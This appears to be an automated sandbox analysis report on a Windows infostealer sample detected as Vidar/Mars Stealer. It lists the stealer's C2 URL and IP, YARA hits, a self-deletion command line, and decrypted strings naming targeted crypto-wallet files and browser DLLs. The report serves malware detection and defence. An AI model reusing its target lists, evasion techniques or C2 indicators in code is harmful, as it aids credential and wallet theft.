Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Overview

General Information

Sample Name:	SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
Analysis ID:	1344917
MD5:	076ac01ea35d4b4a78130ffe0b0da1b9
SHA1:	0e20fae40bccd1f9ac4845ec3ff4f29f5b7250b8
SHA256:	4a4edf2b54ebe39c26293d94699b07050709a8549c213f9ac8f344f766707fc9
Tags:	exe
Infos:

Detection

Mars Stealer, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

Antivirus / Scanner detection for submitted sample

Yara detected Vidar stealer

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Yara detected Mars stealer

Detected unpacking (creates a PE file in dynamic memory)

Snort IDS alert for network traffic

Found evasive API chain (may stop execution after checking mutex)

Tries to steal Crypto Currency Wallets

Self deletion via cmd or bat file

Machine Learning detection for sample

Found C&C like URL pattern

Found evasive API chain (may stop execution after checking locale)

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Sample uses string decryption to hide its real strings

Contains functionality to detect sleep reduction / modifications

Tries to harvest and steal browser information (history, passwords, etc)

Found evasive API chain (may stop execution after checking computer name)

Uses 32bit PE files

Yara signature match

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Queries information about the installed CPU (vendor, model number etc)

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Contains functionality to read the PEB

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

PE / OLE file has an invalid certificate

Dropped file seen in connection with other malware

Uses Microsoft's Enhanced Cryptographic Provider

May check if the current machine is a sandbox (GetTickCount - Sleep)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe (PID: 6720 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe MD5: 076AC01EA35D4B4A78130FFE0B0DA1B9)

cmd.exe (PID: 3612 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 5100 cmdline: timeout /t 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Mars Stealer

{"C2 url": "alpha.twinsources.shop/gate.php"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Unspecified_Malware_Sep1_A1	Detects malware from DrqgonFly APT report	Florian Roth

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1854624029.0000000000401000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1854624029.0000000000401000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000000.00000002.1854624029.0000000000401000.00000040.00000001.01000000.00000003.sdmp	Windows_Trojan_ArkeiStealer_84c7086a	unknown	unknown	0x4520:$a: 01 89 55 F4 8B 45 F4 3B 45 10 73 31 8B 4D 08 03 4D F4 0F BE 19 8B
00000000.00000002.1854693658.000000000043E000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000000.00000002.1854680983.000000000043C000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_Vidar_114258d5	unknown	unknown	0xbb50:$a2: wallet.dat 0xc910:$b1: CC\%s_%s.txt 0xd060:$b2: History\%s_%s.txt 0xd160:$b3: Autofill\%s_%s.txt
Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe PID: 6720	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe PID: 6720	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe PID: 6720	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x7ca92:$a2: wallet.dat 0x7d3fe:$b1: CC\%s_%s.txt 0x7d9f8:$b2: History\%s_%s.txt 0x7da92:$b3: Autofill\%s_%s.txt
decrypted.memstr	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
decrypted.memstr	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x223c:$a2: wallet.dat 0x5e75:$b1: CC\%s_%s.txt 0x6067:$b2: History\%s_%s.txt 0x5db9:$b3: Autofill\%s_%s.txt
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	Unspecified_Malware_Sep1_A1	Detects malware from DrqgonFly APT report	Florian Roth
0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	Windows_Trojan_ArkeiStealer_84c7086a	unknown	unknown	0x4920:$a: 01 89 55 F4 8B 45 F4 3B 45 10 73 31 8B 4D 08 03 4D F4 0F BE 19 8B

Snort Signatures

ET TROJAN Win32/Vidar Variant/Mars Stealer Resources Download - Source IP: 179.43.170.230 - Destination IP: 192.168.2.4

Timestamp:	179.43.170.230192.168.2.480497312036654 11/20/23-05:21:11.743610
SID:	2036654
Source Port:	80
Destination Port:	49731
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Generic gate .php GET with minimal headers - Source IP: 192.168.2.4 - Destination IP: 179.43.170.230

Timestamp:	192.168.2.4179.43.170.23049731802022818 11/20/23-05:21:10.998145
SID:	2022818
Source Port:	49731
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack

Malware Configuration Extractor: Mars Stealer {"C2 url": "alpha.twinsources.shop/gate.php"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	ReversingLabs: Detection: 52%
Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe	Virustotal: Detection: 68%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Avira: detected

Antivirus detection for URL or domain

Source: alpha.twinsources.shop/gate.php	Avira URL Cloud: Label: malware
Source: http://alpha.twinsources.shop/gate.php	Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: LoadLibraryA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetProcAddress
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: ExitProcess
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: advapi32.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: crypt32.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetTickCount
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Sleep
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CreateMutexA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetLastError
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: HeapAlloc
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetProcessHeap
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetComputerNameA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: VirtualProtect
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetCurrentProcess
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetUserNameA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: HAL9TH
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: JohnDoe
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: 21/04/2022 20:00:00
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: http://
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Default
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: %hu/%hu/%hu %hu:%hu:%hu
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: open
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: sqlite3.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: C:\ProgramData\sqlite3.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: freebl3.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: C:\ProgramData\freebl3.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: mozglue.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: C:\ProgramData\mozglue.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: msvcp140.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: C:\ProgramData\msvcp140.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: nss3.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: softokn3.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: C:\ProgramData\softokn3.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: vcruntime140.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: C:\ProgramData\vcruntime140.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: .zip
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Tag:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: IP: IP?
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Country: Country?
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Working Path:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Local Time:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: TimeZone:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Display Language:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Keyboard Languages:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Is Laptop:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Processor:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Installed RAM:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: OS:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Bit)
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Videocard:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Display Resolution:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: PC name:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: User name:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Domain name:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: MachineID:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GUID:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Installed Software:
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: system.txt
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Grabber\%s.zip
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: %APPDATA%
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: %USERPROFILE%
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: %DESKTOP%
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Wallets\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Ethereum
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Ethereum\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: keystore
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Electrum
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Electrum\wallets\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: ElectrumLTC
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Electrum-LTC\wallets\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Exodus
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Exodus\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: exodus.conf.json
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: window-state.json
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Exodus\exodus.wallet\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: passphrase.json
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: seed.seco
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: info.seco
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: ElectronCash
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \ElectronCash\wallets\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: default_wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: MultiDoge
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \MultiDoge\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: multidoge.wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: JAXX
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \jaxx\Local Storage\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: file__0.localstorage
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Atomic
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \atomic\Local Storage\leveldb\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: 000003.log
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CURRENT
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: LOCK
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: MANIFEST-000001
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: 0000*
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Binance
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Binance\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: app-store.json
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: Coinomi
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: \Coinomi\Coinomi\wallets\
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: *.wallet
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: *.config
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: wallet.dat
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetSystemTime
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: lstrcatA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: ntdll.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: sscanf
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: memset
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: memcpy
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: wininet.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: user32.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: gdi32.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: netapi32.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: psapi.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: bcrypt.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: vaultcli.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: shlwapi.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: shell32.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: gdiplus.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: ole32.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: dbghelp.dll
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CreateFileA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: WriteFile
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CloseHandle
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetFileSize
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: lstrlenA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: LocalAlloc
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GlobalFree
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: ReadFile
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: OpenProcess
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: SetFilePointer
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: SetEndOfFile
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetLocalTime
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: LocalFree
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetSystemInfo
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: IsWow64Process
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetTempPathA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetFileSizeEx
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetFileAttributesA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: FindFirstFileA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: FindNextFileA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: FindClose
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetCurrentDirectoryA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CopyFileA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: DeleteFileA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: lstrcmpW
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GlobalAlloc
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: FreeLibrary
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: SetCurrentDirectoryA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: CreateFileMappingA
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: MapViewOfFile
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: UnmapViewOfFile
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: FileTimeToSystemTime
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GetFileInformationByHandle
Source: 0.2.SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe.400000.0.unpack	String decryptor: GlobalLock
